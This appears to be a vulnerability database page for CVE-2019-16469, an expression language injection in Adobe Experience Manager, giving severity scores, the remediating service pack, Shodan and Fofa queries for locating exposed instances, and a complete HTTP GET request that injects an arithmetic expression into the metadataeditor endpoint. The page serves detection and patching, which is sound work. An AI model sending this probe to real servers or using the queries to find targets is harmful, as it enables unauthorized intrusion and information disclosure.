🔙 목록으로 돌아가기

CVE-2019-16469: Adobe Experience Manager - Expression Language Injection

TitleAdobe Experience Manager - Expression Language Injection
AuthorDomenicoVeneziano
SeverityHigh
ImpactSuccessful exploitation could lead to sensitive information disclosure
RemediationTo fix the vulnerability, it is necessary to update the Adobe AEM instance using the Service Pack 6.5.3.0
CVSS Score7.5
EPSS Score0.73573
CVE IDCVE-2019-16469
CWE IDCWE-917
Shodan Queryhttp.component:"Adobe Experience Manager"http.component:"adobe experience manager"http.title:"aem sign in"cpe:"cpe:2.3:a:adobe:experience_manager"
Fofa Querytitle="aem sign in"
Tags cve cve2019 aem eli csti adobe vuln

🔍 Vulnerability Description

Adobe Experience Manager versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0 has an expression language injection vulnerability.

🌐 HTTP Request

GET /mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b902739*807466%7d HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16469.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16469.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A